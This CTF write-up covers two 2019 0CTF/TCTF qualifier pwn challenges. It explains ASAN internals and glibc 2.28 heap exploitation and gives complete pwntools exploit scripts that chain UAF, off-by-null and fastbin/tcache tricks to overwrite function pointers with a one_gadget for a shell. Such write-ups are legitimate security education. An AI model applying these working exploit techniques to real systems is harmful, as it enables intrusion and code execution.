2019 0CTF/TCTF Quals: Partial PWN Write-up

babyaegis

First, let's look at the protections enabled in the binary.

The binary is built with ASAN and UBSAN.

ASAN

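ASAN (AddressSanitizer) is an open-source memory error detector from Google. It detects common bugs such as heap and stack buffer overflows, global buffer overflows, and use-after-free (UAF).

ASAN consists of two parts: compile-time instrumentation and a runtime library. The instrumentation is done at the LLVM compiler level and targets memory-access operations (store, load, alloca, and so on). The runtime library handles the more complex work, such as poisoning/unpoisoning (used for memory protection) and shadow memory, and it hooks functions such as free and malloc. In a program built with ASAN, chunks of different sizes are allocated from different memory regions, and freed memory is not reused for some time. The chunks also differ from ordinary heap chunks: each starts with a 0x10-byte ChunkHeader that stores information about the chunk.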

struct ChunkHeader {
  // 1-st 8 bytes.
  u32 chunk_state       : 8;  // Must be first.
  u32 alloc_tid         : 24;
  u32 free_tid          : 24;
  u32 from_memalign     : 1;
  u32 alloc_type        : 2;
  u32 rz_log            : 3;
  u32 lsan_tag          : 2;
  // 2-nd 8 bytes
  // This field is used for small sizes. For large sizes it is equal to
  // SizeClassMap::kMaxSize and the actual size is stored in the
  // SecondaryAllocator's metadata.
  u32 user_requested_size : 29;
  // align < 8 -> 0
  // else      -> log2(min(align, 512)) - 2
  u32 user_requested_alignment_log : 3;
  u32 alloc_context_id;
};
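To make the bit-field layout concrete, here is a minimal Python sketch that unpacks a 16-byte header into the fields listed above. It assumes the usual little-endian x86-64 layout in which bit-fields are packed starting from the least significant bit. The helper name `decode_chunk_header` and the sample header bytes are illustrative and are not taken from the challenge binary.

```python
import struct


def decode_chunk_header(raw):
    """Split a 16-byte ASAN ChunkHeader into its bit-fields.

    Assumption: little-endian target, bit-fields packed LSB-first.
    """
    w0, w1, w2, ctx = struct.unpack("<IIII", raw[:16])
    return {
        # first 8 bytes
        "chunk_state": w0 & 0xFF,
        "alloc_tid": w0 >> 8,
        "free_tid": w1 & 0xFFFFFF,
        "from_memalign": (w1 >> 24) & 0x1,
        "alloc_type": (w1 >> 25) & 0x3,
        "rz_log": (w1 >> 27) & 0x7,
        "lsan_tag": (w1 >> 30) & 0x3,
        # second 8 bytes
        "user_requested_size": w2 & 0x1FFFFFFF,
        "user_requested_alignment_log": w2 >> 29,
        "alloc_context_id": ctx,
    }


# Illustrative header: first qword 0x02ffffff00000002, requested size 0x10.
sample = struct.pack("<QII", 0x02FFFFFF00000002, 0x10, 0)
fields = decode_chunk_header(sample)
print({name: hex(value) for name, value in fields.items()})
```

The first qword used in the sample is the same constant the exploit script later writes back over the header.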

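Shadow memory: ASAN uses one byte of shadow memory to record the state of eight bytes of main memory, because malloc returns 8-byte-aligned memory. This gives nine possible states:
- All 8 bytes are accessible: the shadow byte is 0.
- None of the 8 bytes are accessible: the shadow byte is negative.
- Only the first n bytes (1 <= n <= 7) are accessible and the rest are not: the shadow byte is n.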
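The three cases above can be sketched as a small check, modelled on the test that ASAN inserts before a memory access. This is a simplified model and not ASAN's actual code: it assumes the access is at most 8 bytes and does not cross an 8-byte boundary, and the names `access_is_valid` and `to_signed` are made up for illustration.

```python
def to_signed(byte):
    """Interpret a raw shadow byte (0..255) as a signed 8-bit value."""
    return byte - 256 if byte >= 128 else byte


def access_is_valid(shadow_byte, addr, size):
    """Return True if `size` bytes at `addr` may be accessed.

    shadow_byte is the signed shadow value of the 8-byte word holding addr.
    """
    if shadow_byte == 0:
        return True                    # all 8 bytes are accessible
    if shadow_byte < 0:
        return False                   # redzone, freed memory, ...
    last = (addr & 7) + size - 1       # offset of the last byte touched
    return last < shadow_byte          # only the first n bytes are accessible


print(access_is_valid(0, 0x1000, 8))
print(access_is_valid(to_signed(0xFD), 0x1000, 1))
print(access_is_valid(4, 0x1002, 4))
```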

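For example, to defend against buffer overflows, ASAN places an extra memory region, called a redzone, before and after the buffer and marks the shadow memory of the redzones as inaccessible.

ASAN maps main memory to shadow memory with a direct mapping: shadow_mem_address = (mem_address >> 3) + offset. On 64-bit the offset is 0x7fff8000; on 32-bit it is 0x20000000.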
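The mapping is easy to check by hand. The sketch below implements the formula in both directions using the 64-bit offset; the function names are illustrative, and the example addresses are the heap addresses that appear in this write-up.

```python
SHADOW_OFFSET_64 = 0x7FFF8000


def mem_to_shadow(addr, offset=SHADOW_OFFSET_64):
    """Address of the shadow byte that describes the 8-byte word at addr."""
    return (addr >> 3) + offset


def shadow_to_mem(shadow, offset=SHADOW_OFFSET_64):
    """Start of the 8-byte word described by the shadow byte at `shadow`."""
    return (shadow - offset) << 3


print(hex(mem_to_shadow(0x602000000000)))
print(hex(mem_to_shadow(0x602000000020)))
print(hex(shadow_to_mem(0xC047FFF8004)))
```

The second value, 0xc047fff8004, is the address later passed to the backdoor function, so the backdoor clears the shadow byte that covers 0x602000000020.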

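Let's see what the ASAN shadow mapping looks like in practice.

After the chunk is deleted, the shadow memory becomes:

In shadow memory, 0xfd means that the corresponding main memory is in the freed state.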

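The 0x10-byte node chunk is allocated at 0x602000000020, and the chunk for buf is at 0x602000000000. The corresponding shadow address is:

hex((0x602000000000 >> 3) + 0x7FFF8000) = 0xc047fff8000

From the shadow data we can see that only the 0x10 bytes at 0x602000000010 and the 0x10 bytes at 0x602000000030 are accessible; the rest of this region is not.

We can also see that chunks of size 0x20 are allocated starting from address 0x602000000000.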

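Exploitation

The structure used by the program is as follows:

The program has three bugs. First, delete does not clear the pointer after freeing, which gives a UAF. Second, if the input to read_until_nl_or_max is exactly size bytes long, the content string and the id end up adjacent with no terminator between them, so the strlen call in update returns more than the intended length and causes a heap overflow. Because of ASAN, neither of these two bugs is exploitable on its own. Third, there is a backdoor-like function that writes 0 to an arbitrary address.

We can therefore use the backdoor function to set the shadow memory of the next chunk to 0, so that the heap overflow can modify the size field of the next chunk.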

add(0x10, "1"*0x8, 0x123456789abcdef)
secret(0xc047fff8004)
update(0, "a"*0x12, 0x123456789) # overwrite chunkheader, off-by-one chunk size to 0
update(0, b'a' * 0x10 + p64(0x02ffffff00000002)[:7], 0x01f000000002ff)

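We first add a note of size 0x10. The buf chunk (a 0x20-size chunk) is allocated first, followed by the node chunk, which gives the memory layout shown above. When the content we enter is size-0x8 bytes long, read_until_nl_or_max returns size-0x8-0x1, and the id entered next is stored starting at that offset, so the content and id fields run together. If the id is 0xf or 0x10 hex digits long, the string also runs into the ChunkHeader of the next chunk. Here the byte just above the top byte of the id is 0xbe (nonzero), so on update strlen returns 0x11; note that the program adds 1 to this length. If we have already used the secret function to set the shadow byte of the node chunk to 0, we can now overwrite the ChunkHeader of the next chunk. Repeating the same content/id concatenation trick extends the overflow to the user_requested_size field of the ChunkHeader.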
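The byte-level effect of these steps can be replayed with a small model in plain Python. This is a sketch under stated assumptions, not a trace of the real binary: it assumes fresh memory is filled with 0xbe, that the node chunk's header initially starts with the qword 0x02ffffff00000002 and has size 0x10, that update reads strlen+1 bytes, and that the 8-byte id is stored at offset len(content)-1. The helper names are hypothetical.

```python
import struct

FILL = 0xBE  # assumed fill byte of freshly allocated ASAN memory


def c_strlen(mem):
    """Length up to the first NUL byte, like C strlen."""
    return mem.index(0)


def store_note(mem, content, note_id):
    """Write content, then the 8-byte id at offset len(content) - 1."""
    mem[0:len(content)] = content
    off = len(content) - 1
    mem[off:off + 8] = struct.pack("<Q", note_id)


# 0x10 bytes of buf user data, followed by the node chunk's 0x10-byte header.
header = struct.pack("<QII", 0x02FFFFFF00000002, 0x10, 0)  # assumed initial state
mem = bytearray([FILL] * 0x10) + bytearray(header)

store_note(mem, b"1" * 8, 0x0123456789ABCDEF)        # add(0x10, "1"*8, ...)
len1 = c_strlen(mem)                                  # runs into the header

store_note(mem, b"a" * (len1 + 1), 0x123456789)       # first update
len2 = c_strlen(mem)

payload = b"a" * 0x10 + struct.pack("<Q", 0x02FFFFFF00000002)[:7]
store_note(mem, payload, 0x01F000000002FF)            # second update

first_qword, size_word = struct.unpack_from("<QI", mem, 0x10)
print(hex(len1), hex(len2), hex(first_qword), hex(size_word))
```

Under these assumptions the two strlen values match the payload lengths used in the script (0x12 = 0x11 + 1 and 0x17 = 0x16 + 1), and the second update restores the first header qword while changing the 32-bit word that holds user_requested_size.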

The low 29 bits of the second 8 bytes of the ChunkHeader hold user_requested_size, so the size is changed from 0x10 to 0x10000000. When this oversized chunk is freed, its shadow memory is reset to 0xfa.
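The size arithmetic can be checked with a few lines of Python. The sketch assumes that the overflow leaves the value 0xf0000000 in the 32-bit word that holds user_requested_size and user_requested_alignment_log (the 0xf0 byte comes from the id 0x01f000000002ff used in the script); `split_size_word` is an illustrative helper.

```python
SIZE_BITS = 29
SIZE_MASK = (1 << SIZE_BITS) - 1


def split_size_word(word):
    """Return (user_requested_size, user_requested_alignment_log)."""
    return word & SIZE_MASK, word >> SIZE_BITS


before = split_size_word(0x00000010)   # fresh 0x10-byte chunk
after = split_size_word(0xF0000000)    # assumed value after the overflow
print([hex(v) for v in before], [hex(v) for v in after])
```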

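If we now allocate another note (node1), the UAF lets us control the node structure through its buf. Controlling the structure means controlling the buf pointer, so notes 0 and 1 together give us an address leak and an arbitrary write.

There are two options for getting a shell. One of them is to overwrite the function pointer _ZN11__sanitizerL15UserDieCallbackE in .bss. During update, if the cfi function address stored in the node differs from the address of cfi_check, the following call chain is triggered:

If we set node1's buf to the address of _ZN11__sanitizerL15UserDieCallbackE, the id position coincides with node0's cfi_address field, so node0 can be used to overwrite the function pointer with the one_gadget address and get a shell.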

# encoding=utf-8
from pwn import *

file_path = "./aegis"
context.arch = "amd64"
context.log_level = "debug"
context.terminal = ['tmux', 'splitw', '-h']
elf = ELF(file_path)
debug = 1
if debug:
    p = process([file_path])
    gdb.attach(p, "b *$rebase(0x114A25)")
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    one_gadget = 0x10a45c

else:
    p = remote('', 0)
    libc = ELF('')
    one_gadget = 0x0


def add(size, content="1\n", id=1):
    p.sendlineafter("Choice: ", "1")
    p.sendlineafter("Size: ", str(size))
    p.sendafter("Content: ", content)
    p.sendlineafter("ID: ", str(id))


def show(index):
    p.sendlineafter("Choice: ", "2")
    p.sendlineafter("Index: ", str(index))


def update(index, content, id):
    p.sendlineafter("Choice: ", "3")
    p.sendlineafter("Index: ", str(index))
    p.sendafter("New Content: ", content)
    p.sendlineafter("New ID: ", str(id))


def delete(index):
    p.sendlineafter("Choice: ", "4")
    p.sendlineafter("Index: ", str(index))


def shut():
    p.sendlineafter("Choice: ", "5")


def secret(address):
    p.sendlineafter("Choice: ", str(666))
    p.sendlineafter("Lucky Number: ", str(address))


add(0x10, "1" * 0x8, 0x123456789abcdef)
secret(0xc047fff8004)
update(0, "a" * 0x12, 0x123456789)  # overwrite chunkheader, off-by-one chunk size to 0
update(0, b'a' * 0x10 + p64(0x02ffffff00000002)[:7], 0x01f000000002ff)
delete(0)
add(0x10, p64(0x602000000018), 0)
show(0)
p.recvuntil("Content: ")
elf.address = u64(p.recv(6).ljust(8, b"\x00")) - 0x114AB0
log.success("elf address {}".format(hex(elf.address)))

puts_got = elf.got['puts']
update(1, p64(puts_got)[:2], puts_got >> 8) # strlen = 1
show(0)
p.recvuntil("Content: ")
libc.address = u64(p.recv(6).ljust(8, b"\x00")) - libc.sym['puts']
log.success("libc address {}".format(hex(libc.address)))

_ZN11__sanitizerL15UserDieCallbackE_address = elf.address + 0xFB0888
update(1, p64(_ZN11__sanitizerL15UserDieCallbackE_address)[:7], 0)
one_gadget += libc.address
update(0, p64(one_gadget)[:1], one_gadget)
p.interactive()

babyheap

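This challenge runs on glibc 2.28. The program offers four functions: add, edit, delete, and show. It first mmaps a region of memory and then allocates one very large chunk before entering the menu loop. add limits the chunk size to at most 0x58 and allocates with calloc, which bypasses tcache. buf_list is stored in the mmap'd region.

The bug is in the edit function: an off-by-null.

Exploitation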

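Leaking the libc base requires an unsorted bin chunk, but the largest chunk we can request is fastbin-sized. Fastbin chunks can be converted through malloc_consolidate, which merges them and moves them out of the fastbins into the unsorted bin (from where they are later sorted into a small bin); the chunk then contains an address near main_arena.

We can use the high byte of a heap address, 0x56, as a fake size to allocate a chunk inside main_arena, overwrite the top chunk pointer so that it points near free_hook, and then overwrite free_hook with a one_gadget.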
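The following sketch shows why 0x56 works as a fake size and where the fake chunk sits. It assumes the 64-bit glibc conventions (size flags in the low three bits, fastbin index (size >> 4) - 2), that calloc additionally asserts the returned chunk is either mmapped or belongs to the arena in use, and that fastbinsY starts at offset 0x10 and top at offset 0x60 (96) inside main_arena. The constants 0x4b, 0x48 and the padding of 3 + 7 * 8 bytes come from the exploit script; the helper names are illustrative.

```python
PREV_INUSE, IS_MMAPPED, NON_MAIN_ARENA = 0x1, 0x2, 0x4


def request2size(req):
    """Chunk size for a request on 64-bit (16-byte aligned, minimum 0x20)."""
    return max(0x20, (req + 8 + 15) & ~15)


def chunksize(size_field):
    """Strip the three flag bits from a size field."""
    return size_field & ~0x7


def fastbin_index(size):
    return (size >> 4) - 2


def fake_size_ok(size_byte, request):
    same_bin = fastbin_index(chunksize(size_byte)) == fastbin_index(request2size(request))
    # Assumed calloc assertion: mmapped, or not flagged as non-main-arena.
    passes_calloc = bool(size_byte & IS_MMAPPED) or not (size_byte & NON_MAIN_ARENA)
    return same_bin and passes_calloc


# Offsets inside main_arena (assumed layout).
FASTBINSY_OFF, TOP_OFF = 0x10, 0x60
fake_chunk = TOP_OFF - 0x4B                    # where the fake chunk starts
size_field = fake_chunk + 8                    # its size field
slot, byte_in_slot = divmod(size_field - FASTBINSY_OFF, 8)
user_data = fake_chunk + 0x10                  # pointer returned to the program
payload_to_top = TOP_OFF - user_data           # padding needed to reach top

print(fake_size_ok(0x56, 0x48), fake_size_ok(0x55, 0x48))
print(slot, byte_in_slot, payload_to_top)
```

Under this layout the fake size byte is byte 5 of fastbinsY[1], that is, the high byte of a heap pointer stored in the 0x30 fastbin. This is why the attack only succeeds when the heap address starts with 0x56 rather than 0x55.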

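malloc_consolidate is triggered when the top chunk is too small for the requested size. After the large allocation at program start, the top chunk size is 0x1da0. Note that while consuming the top chunk we need to allocate contiguous fastbin chunks beforehand, so that they can be merged later.
After consolidation produces an unsorted bin chunk, we use the off-by-one to overwrite its size field, shrinking the unsorted chunk so that it ends at the prev_size/size pair laid out earlier, and then trigger consolidation again to merge chunks. A few more allocations then yield two pointers to the same chunk.
We use a fastbin attack to allocate a chunk inside main_arena, using the 0x56 high byte of a chunk address as the size, and overwrite the top chunk pointer to point at the start of the heap. The start of the heap holds the tcache_perthread_struct, which is also what the key field of tcache_entry points to (in glibc builds that have this field). Overwriting this structure lets us change the number of chunks recorded in tcache.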
typedef struct tcache_perthread_struct
{
  char counts[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;
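After a few consecutive allocations we get a chunk at the start of the heap and overwrite all the counts with zero. We then overwrite the top chunk pointer to point at stdin and keep allocating chunks to consume the top chunk until a chunk lands on free_hook. While allocating, whenever a tcache bin fills up we must zero its count again, so that freed chunks do not go into the fastbins and interfere with later allocations.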
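To see why a 0x28-byte write of zeros is enough to reset the counters, here is a small model of the structure above. It assumes TCACHE_MAX_BINS is 64 and the 64-bit index formula (chunk size - 0x20) / 0x10; the bytearray stands in for the real structure and `csize2tidx` mirrors the glibc macro name for aligned sizes only.

```python
TCACHE_MAX_BINS = 64


def csize2tidx(chunk_size):
    """tcache bin index for an aligned chunk size on 64-bit."""
    return (chunk_size - 0x20) // 0x10


# counts[] (1 byte per bin) followed by entries[] (8 bytes per bin)
tcache = bytearray(TCACHE_MAX_BINS + TCACHE_MAX_BINS * 8)

# Pretend the bins used by the exploit (chunk sizes 0x30..0x60) are full.
used_bins = [csize2tidx(size) for size in (0x30, 0x40, 0x50, 0x60)]
for idx in used_bins:
    tcache[idx] = 7

# The edit of 0x28 zero bytes from the script, applied to the model.
tcache[:0x28] = bytes(0x28)

print(used_bins, [tcache[idx] for idx in used_bins])
```

All four counters lie in the first five bytes of the structure, so they are cleared by the write; the write also zeroes the counters of the other bins covered by the first 0x28 bytes.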

# encoding=utf-8
from pwn import *

file_path = "./babyheap"
context.arch = "amd64"
context.log_level = "debug"
context.terminal = ['tmux', 'splitw', '-h']
elf = ELF(file_path)
debug = 1
if debug:
    p = process([file_path])
    # gdb.attach(p, "b *$rebase(0x18a7)")
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    one_gadget = 0x103f50

else:
    p = remote('', 0)
    libc = ELF('')
    one_gadget = 0x0


def add(size):
    p.sendlineafter("Command: ", "1")
    p.sendlineafter("Size: ", str(size))


def edit(index, size, content):
    p.sendlineafter("Command: ", "2")
    p.sendlineafter("Index: ", str(index))
    p.sendlineafter("Size: ", str(size))
    p.sendafter("Content: ", content)


def delete(index):
    p.sendlineafter("Command: ", "3")
    p.sendlineafter("Index: ", str(index))


def show(index):
    p.sendlineafter("Command: ", "4")
    p.sendlineafter("Index: ", str(index))


def padding(size):
    for i in range(7):
        add(size)
        edit(i, size, "a" * size)

    for i in range(7):
        delete(i)


def padding2(size, index_array):
    for i in range(6):
        add(size)
    for i in index_array:
        delete(i)
    edit(12, 0x28, b"\x00" * 0x28)


# 0x555555578260 (size : 0x1da0)
padding(0x28)  # cost 0x700
padding(0x38)  # remain 0x1000

for i in range(8):
    add(0x48)
    edit(i, 0x48, "a" * 0x48)
for i in range(7):
    delete(i)

# remain 0x800
for i in range(4):  # fastbin
    add(0x38)
    edit(i, 0x38, "a" * 0x38)
add(0x38)
# make fake chunk
edit(4, 0x38, p64(0) * 4 + p64(0x100) + p64(0x60) + p64(0))
# remain 0x300
add(0x48)
edit(5, 0x48, "a" * 0x48)
add(0x38)
edit(6, 0x38, "a" * 0x38)
# remain 0x100

for i in range(5):
    delete(i)

add(0x58)
add(0x58)
# remain 0x40
# malloc_consolidate, get 0x40*5 - 0x30 = 0x110 unsorted bin
add(0x28)
# off-by-one, 0x110->0x100
edit(2, 0x28, "a" * 0x28)
delete(5)
add(0x38)  # 3
add(0x38)
add(0x38)  # 5
add(0x38)  # 8
delete(3)
delete(4)
# malloc_consolidate fastbin, get 0x50+0x110-0x30=0x130 unsorted bin
add(0x28)  # 3
add(0x48)  # 4
show(5)
p.recvuntil("Chunk[5]: ")
libc.address = u64(p.recv(8)) - 96 - 0x10 - libc.sym['__malloc_hook']
log.success("libc address {}".format(hex(libc.address)))

top_chunk_address = libc.sym['__malloc_hook'] + 0x10 + 96

add(0x48)  # 9 = 5, overlap 8
delete(4)
delete(9)
delete(2)
show(5)
p.recvuntil("Chunk[5]: ")
heap_address = u64(p.recv(8))
log.success("heap address {}".format(hex(heap_address)))

edit(5, 0x8, p64(top_chunk_address - 0x4b))
add(0x48)  # 2 = 5, overlap 8
add(0x48)  # 4 main_arena chunk

tcache_entry_address = heap_address - 0x1f850
edit(4, 0x43, b"\x00" * 0x3 + p64(0) * 7 + p64(tcache_entry_address))

add(0x58)  # 9
add(0x28)  # 10
add(0x28)
add(0x28)  # 12 tcache_entry
edit(12, 0x28, "\x00" * 0x28)  # overwrite tcache_entry
delete(10)
delete(11)
delete(9)

# 0x7ffff7fc18e8 <__free_hook>, 0x7ffff7fc0850 <stdin>
edit(4, 0x43, b"\x00" * 0x3 + p64(0) * 7 + p64(libc.sym['stdin']))

index_array = [9, 10, 11, 13, 14, 15]
for i in range(7):
    padding2(0x58, index_array)

# gdb.attach(p, "b *$rebase(0x18a7)")

add(0x58) # 9
add(0x58)
add(0x58) # 11

edit(11, 0x10, p64(0) + p64(libc.address + one_gadget))

delete(9)

p.interactive()